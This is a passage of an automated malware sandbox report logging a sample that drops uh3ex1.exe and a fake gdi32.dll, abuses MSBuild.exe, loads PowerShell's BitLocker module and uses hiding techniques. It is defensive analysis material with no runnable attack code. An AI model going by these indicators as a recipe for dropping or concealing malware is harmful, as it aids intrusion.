                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_00FC1980 push esp; iretd 6_2_00FC1981
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_00FC1D41 push edx; iretd 6_2_00FC1D53
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_00FC12DC push ecx; iretd 6_2_00FC12E8
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_00FC12C5 push 00000021h; iretd 6_2_00FC12D1
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_00FC06B7 pushad ; iretd 6_2_00FC06D2
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_00FC12B0 push ds; iretd 6_2_00FC12BA
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_00FC1EAE push esp; iretd 6_2_00FC1EB6
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_00FC1262 push ds; iretd 6_2_00FC1263
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_00FC2A53 push edx; iretd 6_2_00FC2A5E
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_00FC124B push ds; iretd 6_2_00FC124C
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_00FC1234 push ds; iretd 6_2_00FC1235
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_00FC1A27 push ds; iretd 6_2_00FC1A28
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_00FC121D push ds; iretd 6_2_00FC121E
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_00FC5E18 push D0029B30h; iretw 6_2_00FC5E1D
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_00FC2A14 push edx; iretd 6_2_00FC2A15
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_00FC1206 push ds; iretd 6_2_00FC1207
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_00FC131A push ds; iretd 6_2_00FC131B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_054E9A1A push eax; retf 8_2_054E9A1B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_07096C30 push 00000006h; ret 8_2_07096C40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_07114D52 push E8070BABh; iretd 8_2_07114D5D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_07117BA8 pushad ; retf 8_2_07117BB1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_072AE1F3 push esp; retf 8_2_072AE231
                      Source: uh3ex1.exe.1.drStatic PE information: section name: .text entropy: 7.8298536407435835
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeFile created: C:\Path1\To2\Save444\uh3ex1.exeJump to dropped file
                      Source: C:\Path1\To2\Save444\uh3ex1.exeFile created: C:\Users\user\AppData\Roaming\gdi32.dllJump to dropped file

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Loading BitLocker PowerShell Module
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
